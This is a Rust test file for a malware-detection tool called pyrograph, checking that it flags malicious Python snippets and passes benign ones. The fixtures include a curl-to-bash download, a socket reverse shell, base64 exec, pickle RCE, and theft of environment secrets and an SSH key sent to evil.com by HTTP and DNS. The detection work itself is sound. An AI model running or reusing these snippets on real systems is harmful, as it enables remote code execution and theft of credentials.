// pyrograph 0.1.0
//
// GPU-accelerated taint analysis for supply chain malware detection
// Documentation
#![cfg(feature = "python")]
use pyrograph::analyze;

/// Asserts that analysing the Python snippet `code` yields at least one finding.
///
/// The snippet is parsed under the file name `{name}.py`, and `name` also tags
/// the diagnostic line written to stderr and the assertion message.
///
/// # Panics
///
/// Panics if the parse or `analyze` result cannot be unwrapped, or if the
/// resulting set of findings is empty.
fn py_detect(code: &str, name: &str) {
    let file_name = format!("{name}.py");
    let graph = pyrograph::parse::python::parse_python_with_labels(code, &file_name, None).unwrap();
    let findings = analyze(&graph).unwrap();
    let count = findings.len();
    eprintln!("{name}: {count} findings");
    assert!(!findings.is_empty(), "{name}: must detect");
}

/// Asserts that analysing the Python snippet `code` yields no findings.
///
/// The snippet is parsed under the file name `{name}.py`, and `name` also tags
/// the diagnostic line written to stderr and the assertion message.
///
/// # Panics
///
/// Panics if the parse or `analyze` result cannot be unwrapped, or if any
/// finding is reported.
fn py_clean(code: &str, name: &str) {
    let file_name = format!("{name}.py");
    let graph = pyrograph::parse::python::parse_python_with_labels(code, &file_name, None).unwrap();
    let findings = analyze(&graph).unwrap();
    let count = findings.len();
    eprintln!("{name}: {count} findings");
    assert!(findings.is_empty(), "{name}: must NOT detect");
}

/// A `curl ... | bash` pipeline handed to `os.system` must be reported.
#[test]
fn python_os_system_curl() {
    let source = "import os\nos.system('curl https://evil.com/payload | bash')";
    let label = "os_system_curl";
    py_detect(source, label);
}

/// A `wget` download launched through `subprocess.run` must be reported.
#[test]
fn python_subprocess_wget() {
    let source = "import subprocess\nsubprocess.run(['wget', 'https://evil.com/malware', '-O', '/tmp/mal'])";
    let label = "subprocess_wget";
    py_detect(source, label);
}

/// `exec` applied to a base64-decoded string literal must be reported.
#[test]
fn python_exec_base64() {
    let source = "import base64\nexec(base64.b64decode('cHJpbnQoJ3B3bmVkJyk=').decode())";
    let label = "exec_base64";
    py_detect(source, label);
}

/// A socket connection whose file descriptor is wired to `/bin/sh -i` via
/// `subprocess.call` must be reported.
#[test]
fn python_socket_reverse_shell() {
    let source = "import socket,subprocess\ns=socket.socket()\ns.connect(('evil.com',4444))\nsubprocess.call(['/bin/sh','-i'],stdin=s.fileno(),stdout=s.fileno())";
    let label = "socket_reverse";
    py_detect(source, label);
}

/// An environment variable read with `os.environ.get` and sent out through
/// `requests.post` must be reported.
#[test]
fn python_requests_post_env() {
    let source = "import os,requests\ntoken=os.environ.get('SECRET')\nrequests.post('https://evil.com',data=token)";
    let label = "requests_env_exfil";
    py_detect(source, label);
}

/// `pickle.loads` applied to a base64-decoded blob must be reported.
#[test]
fn python_pickle_rce() {
    let source = "import pickle,base64\npickle.loads(base64.b64decode('gASVMAAAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlIwOaW1wb3J0IG9zO29zLnN5c3RlbSgnaWQnKZSFlFKULg=='))";
    let label = "pickle_rce";
    py_detect(source, label);
}

/// Looping over `os.environ.items()` and embedding each pair in a hostname
/// passed to `socket.getaddrinfo` must be reported.
#[test]
fn python_env_dump_dns() {
    let source = "import os,socket\nfor k,v in os.environ.items():\n    socket.getaddrinfo(f'{k}.{v}.evil.com',80)";
    let label = "env_dns_exfil";
    py_detect(source, label);
}

/// Reading `/home/user/.ssh/id_rsa` and posting its contents with
/// `requests.post` must be reported.
#[test]
fn python_file_theft() {
    let source = "import requests\nwith open('/home/user/.ssh/id_rsa') as f:\n    requests.post('https://evil.com',data=f.read())";
    let label = "ssh_key_theft";
    py_detect(source, label);
}

// False-positive guards: benign snippets that must produce no findings.

/// A minimal Flask app with a single route returning a constant string must
/// produce no findings.
#[test]
fn python_flask_route_clean() {
    let source = "from flask import Flask\napp=Flask(__name__)\n@app.route('/')\ndef index():\n    return 'hello'";
    let label = "flask_route";
    py_clean(source, label);
}

/// A trivial pytest-style test function must produce no findings.
#[test]
fn python_pytest_clean() {
    let source = "import pytest\ndef test_addition():\n    assert 1+1==2";
    let label = "pytest";
    py_clean(source, label);
}

/// Creating a logger and emitting a constant info message must produce no
/// findings.
#[test]
fn python_logging_clean() {
    let source = "import logging\nlogger=logging.getLogger(__name__)\nlogger.info('starting server')";
    let label = "logging";
    py_clean(source, label);
}

/// Loading a CSV with pandas and printing its summary must produce no
/// findings.
#[test]
fn python_pandas_clean() {
    let source = "import pandas as pd\ndf=pd.read_csv('data.csv')\nprint(df.describe())";
    let label = "pandas";
    py_clean(source, label);
}